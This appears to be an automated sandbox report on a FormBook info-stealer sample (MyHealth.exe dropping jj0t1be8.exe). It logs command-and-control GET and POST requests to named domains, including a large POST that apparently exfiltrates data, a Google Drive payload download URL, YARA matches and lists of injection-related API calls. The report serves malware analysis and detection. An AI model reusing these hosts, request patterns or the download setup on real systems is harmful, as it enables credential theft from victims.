48 54 37 38 66 54 74 31 79 71 73 30 6c 33 73 59 4b 37 51 54 70 34 6e 57 30 65 65 64 75 44 55 78 58 4c 53 32 44 4d 46 61 50 53 75 70 32 39 65 50 36 4f 57 35 4b 47 39 45 54 30 61 69 46 74 59 61 4b 33 30 63 70 61 54 55 4b 4f 48 6b 68 44 79 52 42 2d 68 67 35 6d 49 4c 76 37 78 78 45 7a 4f 45 58 4b 69 44 7a 57 7a 75 49 53 73 76 4e 39 61 79 44 5a 43 6c 68 73 52 57 78 75 39 2d 37 34 57 67 6f 31 62 57 4d 67 70 76 32 57 55 6d 61 74 75 38 76 38 54 54 72 64 38 51 4b 5f 6d 58 39 46 61 32 51 79 36 63 7a 62 35 4b 55 64 66 6f 7a 74 63 7a 4e 44 7a 38 76 49 6f 6d 56 6a 51 31 28 32 6e 72 6c 4f 6f 6c 7a 4e 33 4c 63 73 52 69 7a 44 6c 4c 58 6e 6f 4e 36 65 51 32 38 78 62 2d 48 5f 53 5a 7a 54 63 52 46 48 71 52 7e 48 74 79 49 5f 4a 59 34 4d 55 32 46 36 28 38 47 4b 7e 70 70 68 77 42 77 55 51 44 73 6b 6c 4f 76 44 77 68 7a 37 31 71 6d 64 37 41 33 58 53 4f 5a 46 62 5f 52 54 52 77 63 7a 4d 68 6c 49 54 4f 6f 69 70 46 4b 55 4c 62 67 36 62 42 36 55 75 75 30 41 6e 55 4e 63 34 77 6b 41 7a 67 41 71 64 77 43 67 55 6f 58 59 39 76 78 39 64 31 4
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /w0k/?Ttxh=BsZtdbGEqYRX9CHRV2gAtaO3s0ulgLgaWCJNpi2XP7BrmOUg8feAdzCwhS6+qMEp0P/Y&GVm=4hedNPC8WB6p HTTP/1.1 | Host: www.factorylegends.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /w0k/?Ttxh=bOZei0djbqQh4s/jjsK6/wovAQFBdVAJChW9V931OnaIZSC2PGiIkIz/okgGLWbQ2jbY&GVm=4hedNPC8WB6p HTTP/1.1 | Host: www.frawgboy.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /w0k/?Ttxh=PcDZAYiJMyi1sNPMwoDVqsoC1cthxoAbOhKng71B3qX+ijDUh+XAYLydGv6YiAGIrKQP&GVm=4hedNPC8WB6p HTTP/1.1 | Host: www.kiheielectricbikes.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /w0k/?Ttxh=K42Ma8CsrX67CksjQH12R0Ttz7K+7j+uYmNE91+lE2r7D1u+oYQSBjHsLCqRW2+VsJ6V&GVm=4hedNPC8WB6p HTTP/1.1 | Host: www.3365ssr.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /w0k/?Ttxh=GyxwCZ1M+WopjQK5e9tGW3/PGaHjfFVHL5opZNL+ev8OmAkRdzMLOIFVrphwPYji8i11&GVm=4hedNPC8WB6p HTTP/1.1 | Host: www.sebasview.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /w0k/?Ttxh=vO9Vm2RARflm5p1PFXqn6eBrWTFFnunBf6X3DMkFEdmGbjkCk/pABuPtOpuxvLvCis20&GVm=4hedNPC8WB6p HTTP/1.1 | Host: www.michalshahar.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /w0k/?Ttxh=sem+50/0YH3mEWESa99Xfx4+r5czIuNqkkKFb8xjbyQB4/frawbs3iCD49k7i6p7/qu6&GVm=4hedNPC8WB6p HTTP/1.1 | Host: www.nacemo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /w0k/?Ttxh=chA0yBmUTNqQLPZwVUvzar2BiddoiQLWjuJCjqNw20a2YkZ8Mux+jO9XQqSfhLpE4lVG&GVm=4hedNPC8WB6p HTTP/1.1 | Host: www.workingtechnologiesmexico.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: doc-0k-3c-docs.googleusercontent.com
Posts data to webserver
Source: unknownHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.frawgboy.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.frawgboy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frawgboy.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 54 73 56 6b 38 52 38 55 44 4d 64 5f 6a 76 7a 4b 71 6f 44 46 72 67 51 4c 51 41 56 50 66 52 49 33 5a 55 44 50 51 5f 33 59 47 48 6d 76 4a 78 54 70 42 48 54 5f 70 64 36 55 38 58 68 35 45 31 79 5f 33 6a 4b 4c 51 6c 52 4e 37 37 6d 4b 75 65 48 48 36 74 6a 47 71 6c 36 30 39 41 47 57 30 52 57 6b 66 79 47 4d 62 2d 79 6f 6e 66 57 45 45 5a 67 6d 7e 73 31 76 74 50 4b 70 41 6c 6c 2d 49 79 65 61 41 35 45 52 47 4d 61 55 73 73 49 76 37 4b 7a 5a 63 6e 79 54 4c 53 33 36 56 65 67 44 77 78 4b 70 71 52 4e 54 57 75 72 4b 49 69 74 4a 46 46 6c 41 56 47 6b 61 68 4c 44 53 4d 72 6a 49 5a 50 45 34 7a 45 6e 57 69 5f 42 58 56 36 71 39 68 74 63 6d 68 70 45 4a 61 39 79 63 56 61 42 57 76 54 67 42 4b 56 46 79 75 4d 79 42 61 4e 37 79 4e 47 45 65 79 72 79 72 56 64 55 33 6e 44 57 76 35 49 35 68 31 49 50 32 55 4a 49 74 65 4c 36 65 75 61 61 67 58 53 69 54 52 73 73 5a 66 4a 69 41 35 33 77 69 4d 48 44 79 66 70 77 75 39 5f 67 55 67 38 45 79 62 59 54 79 43 4a 63 65 5a 6e 47 5f 58 6b 36 50 78 47 70 54 58 5f 4d 4c 72 66 73 4e 73 38 56 31 4e 30 77 77 76 44 33 78 6d 4b 51 52 5a 4e 77 4c 6c 32 31 66 4f 53 72 30 51 52 62 4f 6a 30 66 61 65 43 53 46 66 68 37 6b 74 65 52 59 57 44 66 5f 57 5a 6f 78 76 74 38 63 33 54 35 76 28 71 32 63 65 31 41 62 48 6f 34 57 36 34 74 51 6c 52 62 4d 76 43 46 61 44 53 78 41 4c 54 79 6f 62 62 45 76 38 31 70 62 4b 43 65 59 35 34 41 32 76 30 72 32 34 61 33 58 4a 52 68 39 6a 45 66 66 55 6c 31 76 4f 30 64 6b 68 37 34 48 68 44 69 2d 46 79 36 6b 48 34 76 6d 42 59 68 4c 57 63 78 68 49 62 67 6c 7a 44 50 77 39 55 30 62 65 42 4b 49 51 52 62 69 4b 37 6c 55 49 35 79 7a 76 4b 69 
71 6f 61 51 45 48 70 43 4a 77 79 43 38 7e 68 49 66 44 34 71 41 4a 43 58 4d 37 6f 7e 32 76 2d 67 71 56 6b 42 63 54 64 58 52 74 56 4b 43 71 4a 34 70 7a 54 41 63 35 62 6c 6d 6c 77 38 70 7e 58 78 2d 56 43 4f 34 52 6f 34 38 59 49 71 55 76 37 50 4a 68 50 76 75 34 54 39 6d 6f 2d 46 2d 77 34 34 2d 76 51 54 6f 68 76 39 2d 36 49 47 7a 50 6c 59 66 70 41 6a 63 63 6d 30 37 47 4a 77 4c 42 76 68 5f 32 53 38 44 53 71 50 54 69 66 6e 74 79 39 44 38 74 41 71 42 7a 5f 49 4f 4b 2d 4c 44 4c 48 50 48 43 4d 62 70 35 53 31 44 53 58 45 4b 4b 79 6e 58 59 66 58 4d 58 46 30 6f 50 6a 63 44 66 31 32 52 75 4d 45 6c 6d 78 6f 65 61 42 43 79 42 77 53 52 6d 53 31 32 39 53 6c 47 76 53 46 46 46 47 41 75 46 73 75 4a 75 5a 44 6c 7e 57 7a 30 71 42 57 73 68 4a 78 4e 78 4c 53 4a 71 5a 58 4f 50 35 69 71 6d 4f 37 4d 58 64 4a 55 52 5f 37 52 4a 6c 30 43 54 31 66 51 6b 32 78 30 41 4a 51 30 45 48 6a 49 44 79 4a 55 4c 41 54 61 6a 77 6c 75 54 38 55 46 35 72 58 49 30 6c 63 63 4a 41 55 4b 31 64 5a 6a 74 66 4d 4a 6f 47 6a 70 71 6c 39 6f 72 63 52 59 6f 5
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 20 Mar 2020 13:10:49 GMT | Content-Type: text/html | Content-Length: 162 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Urls found in memory or binary data
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: jj0t1be8.exe, 00000010.00000003.1070374162.00000000009C7000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/GTS1O1.crl0
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: MyHealth.exe, 00000002.00000002.829860433.00000000004F0000.00000040.00000001.sdmp, jj0t1be8.exe, 0000000F.00000002.1075948123.0000000002A50000.00000040.00000001.sdmp, jj0t1be8.exe, 00000010.00000002.1086535542.00000000004F0000.00000040.00000001.sdmp, jj0t1be8.exe, 00000011.00000002.1090982948.00000000004F0000.00000040.00000001.sdmp | String found in binary or memory: http://myurl/myfile.bin
Source: jj0t1be8.exe, 00000010.00000003.1070146631.000000000098B000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.g2
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: jj0t1be8.exe, 00000010.00000003.1070374162.00000000009C7000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gts1o10
Source: jj0t1be8.exe, 00000010.00000003.1070374162.00000000009C7000.00000004.00000001.sdmp | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.800524392.0000000007B92000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: jj0t1be8.exe, 00000010.00000003.1070146631.000000000098B000.00000004.00000001.sdmp, jj0t1be8.exe, 00000010.00000003.1067054699.00000000009AF000.00000004.00000001.sdmp | String found in binary or memory: http://www.google.com/support/accounts/answer/151657?hl=en
Source: jj0t1be8.exe, 00000010.00000003.1070146631.000000000098B000.00000004.00000001.sdmp | String found in binary or memory: http://www.google.com/support/accounts/answer/151657?hl_
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp, jj0t1be8.exe, 00000010.00000003.1070146631.000000000098B000.00000004.00000001.sdmp | String found in binary or memory: https://doc-14-bo-docs.googleusercontent.com/
Source: jj0t1be8.exe, 00000010.00000003.1070146631.000000000098B000.00000004.00000001.sdmp | String found in binary or memory: https://doc-14-bo-docs.googleusercontent.com/;
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp | String found in binary or memory: https://doc-14-bo-docs.googleusercontent.com/K
Source: jj0t1be8.exe, 00000010.00000003.1070146631.000000000098B000.00000004.00000001.sdmp | String found in binary or memory: https://doc-14-bo-docs.googleusercontent.com/doI
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp | String found in binary or memory: https://doc-14-bo-docs.googleusercontent.com/docs/securesc/plapmduvvfganab5gel4b10ifq42kjev/4
Source: jj0t1be8.exe, 00000010.00000003.1070146631.000000000098B000.00000004.00000001.sdmp | String found in binary or memory: https://doc-14-bo-docs.googleusercontent.com/docs/securesc/plapmduvvfganab5gel4b10ifq42kjev/45cqeqn6
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp | String found in binary or memory: https://docs.google.com/
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp | String found in binary or memory: https://docs.google.com/LC1
Source: jj0t1be8.exe, 00000010.00000003.1070146631.000000000098B000.00000004.00000001.sdmp, jj0t1be8.exe, 00000010.00000003.1067054699.00000000009AF000.00000004.00000001.sdmp | String found in binary or memory: https://docs.google.com/nonceSigner?nonce=pgpoiipb1iqgc&continue=https://doc-14-bo-docs.googleuserco
Source: jj0t1be8.exe, 00000010.00000003.1070146631.000000000098B000.00000004.00000001.sdmp | String found in binary or memory: https://docs.google.com/nonceSigner?nonce=pgpoiipb1iqgc&continue=https://l
Source: jj0t1be8.exe, 00000010.00000002.1088017475.0000000000920000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp, jj0t1be8.exe, 00000011.00000002.1090982948.00000000004F0000.00000040.00000001.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1k5iIo86I_9tca6MgTVAFkaueamKbSbMT
Source: MyHealth.exe, 00000002.00000002.829860433.00000000004F0000.00000040.00000001.sdmp, jj0t1be8.exe, 0000000F.00000002.1075948123.0000000002A50000.00000040.00000001.sdmp, jj0t1be8.exe, 00000010.00000002.1086535542.00000000004F0000.00000040.00000001.sdmp, jj0t1be8.exe, 00000011.00000002.1090982948.00000000004F0000.00000040.00000001.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1k5iIo86I_9tca6MgTVAFkaueamKbSbMT9
Source: jj0t1be8.exe, 00000010.00000002.1088017475.0000000000920000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/x
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp | String found in binary or memory: https://pki.goog
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp | String found in binary or memory: https://pki.goog/repository/0
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Potential malicious icon found
Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Contains functionality to call native functions
Source: C:\Users\user\Desktop\MyHealth.exe | Code function: 2_2_1F53A750 NtCreateFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\MyHealth.exe | Code function: 2_2_1F53A700 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\MyHealth.exe | Code function: 2_2_1F53A720 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\Desktop\MyHealth.exe | Code function: 2_2_1F53A610 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\MyHealth.exe | Code function: 2_2_1F53A6A0 NtCreateSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\MyHealth.exe | Code function: 2_2_1F53A540 NtDelayExecution,LdrInitializeThunk
Source: C:\Users\user\Desktop\MyHealth.exe | Code function: 2_2_1F53A560 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Desktop\MyHealth.exe | Code function: 2_2_1F53A5F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\MyHealth.exe | Code function: 2_2_1F53A410 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\MyHealth.exe | Code function: 2_2_1F53A480 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\MyHealth.exe | Code function: 2_2_1F53A4A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\MyHealth.exe | Code function: 2_2_1F53A360 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\MyHealth.exe | Code function: 2_2_1F53A3E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\MyHealth.exe | Code function: 2_2_1F53A240 NtReadFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\MyHealth.exe | Code function: 2_2_1F53A2D0 NtClose,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 15_2_02A50084 NtSetInformationThread,TerminateProcess
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 15_2_02A525FD NtProtectVirtualMemory
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 15_2_02A52A1D NtResumeThread
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 15_2_02A50E54 NtWriteVirtualMemory
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 15_2_02A525DA NtProtectVirtualMemory
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A750 NtCreateFile,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A700 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A720 NtResumeThread,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A610 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A6A0 NtCreateSection,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A540 NtDelayExecution,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A560 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A5F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A410 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A480 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A4A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A360 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A3E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A240 NtReadFile,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A2D0 NtClose,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A710 NtQuerySection
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A780 NtOpenDirectoryObject
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A650 NtQueueApcThread
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A6D0 NtCreateProcessEx
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40BD40 NtSuspendThread
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A520 NtEnumerateKey
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A5A0 NtWriteVirtualMemory
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A460 NtOpenProcess
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A470 NtSetInformationFile
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40B470 NtOpenThread
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40B410 NtOpenProcessToken
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A430 NtQueryVirtualMemory
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40ACE0 NtCreateMutant
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A350 NtQueryValueKey
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A370 NtQueryInformationProcess
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A310 NtEnumerateValueKey
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A3D0 NtCreateKey
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A260 NtWriteFile
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A220 NtWaitForSingleObject
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40BA30 NtSetContextThread
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A2F0 NtQueryInformationFile
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40A800 NtSetValueKey
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_1F40B0B0 NtGetContextThread
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_004F0084 NtSetInformationThread
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_004F2A1D NtSetInformationThread
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_004F135E Sleep,NtProtectVirtualMemory
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_004F0BD0 RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_004F0BAA CreateThread,TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_004F25FD NtProtectVirtualMemory
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_004F13B3 LdrInitializeThunk,NtProtectVirtualMemory
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 16_2_004F25DA NtProtectVirtualMemory
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A750 NtCreateFile,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A700 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A720 NtResumeThread,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A610 NtAdjustPrivilegesToken,LdrInitializeThunk
